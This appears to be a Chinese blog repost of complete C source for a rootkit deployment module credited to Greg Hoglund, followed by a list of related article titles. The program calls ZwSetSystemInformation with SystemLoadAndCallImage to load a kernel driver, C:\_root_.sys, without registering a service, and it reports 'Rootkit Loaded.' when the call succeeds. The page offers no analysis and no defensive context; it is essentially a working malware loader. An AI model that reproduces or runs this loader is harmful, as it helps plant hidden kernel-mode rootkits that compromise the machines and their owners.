用ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动
2010-03-19 11:05
821 查看
//////////////////////////////////////// // New Deployment Module for rootkit 040 // ------------------------------------- // -Greg Hoglund http://www.rootkit.com //////////////////////////////////////// #include <windows.h> #include <stdio.h> typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; #ifdef MIDL_PASS [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer; #else // MIDL_PASS PWSTR Buffer; #endif // MIDL_PASS } UNICODE_STRING, *PUNICODE_STRING; typedef unsigned long NTSTATUS; #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) NTSTATUS (__stdcall *ZwSetSystemInformation)( IN DWORD SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength ); VOID (__stdcall *RtlInitUnicodeString)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE { UNICODE_STRING ModuleName; } SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE; #define SystemLoadAndCallImage 38 void main(void) { /////////////////////////////////////////////////////////////// // Why mess with Drivers? /////////////////////////////////////////////////////////////// SYSTEM_LOAD_AND_CALL_IMAGE GregsImage; WCHAR daPath[] = L"\\??\\C:\\_root_.sys"; ////////////////////////////////////////////////////////////// // get DLL entry points ////////////////////////////////////////////////////////////// if( !(RtlInitUnicodeString = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString" )) ) exit(1); if( !(ZwSetSystemInformation = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) ) exit(1); RtlInitUnicodeString( &(GregsImage.ModuleName), daPath ); if NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ) { printf("Rootkit Loaded.\n"); } else { printf("Rootkit not loaded.\n"); } }
相关文章推荐
- ZwSetSystemInformation的SystemLoadAndCallImage 加载驱动的缺陷
- 用SystemLoadAndCallImage加载Rootkit
- (转载)用SystemLoadAndCallImage加载Rootkit
- Loading Rootkit using SystemLoadAndCallImage
- 用SystemLoadAndCallImage加载Rootkit
- fix errors 1088: “Failed to execute request because the App-Domain could not be created. Error: 0x80070005 Access is denied” and 1334: “Exception: System.IO.FileLoadException”
- 分享一个图:Linux kernel System Call Interface and glibc
- C# 调用 dll 报错 System.BadImageFormatException:
- 《Linux操作系统分析》之分析系统调用system_call的处理过程
- System call using assembly language and C
- Load, Modify, and Save an Image
- arguments.callee 调用自身 caller,callee,apply and call
- 在64位系统下安装32位ODBC驱动问题How to install and configure a 32 bit ODBC driver on a 64 bit Operating System?
- 16. 26. 3. 装入想要尺寸的图片 Load Image and scale it
- systemtap dump kernel function call stack and print function parameters
- Ruby: Call the system and get system information.
- 从C调用Python脚本unableto load the file system codec ImportError错误解决方法
- Unhandled Exception: System.BadImageFormatException: Could not load file or assembly
- Delphi 调用 C# Dll 时一个编译问题 mscorlib_TLB.h Ambiguity between 'String' and 'System::String'
- 通过ZwSetSystemInformation和ZwLoadDriver加载驱动(转)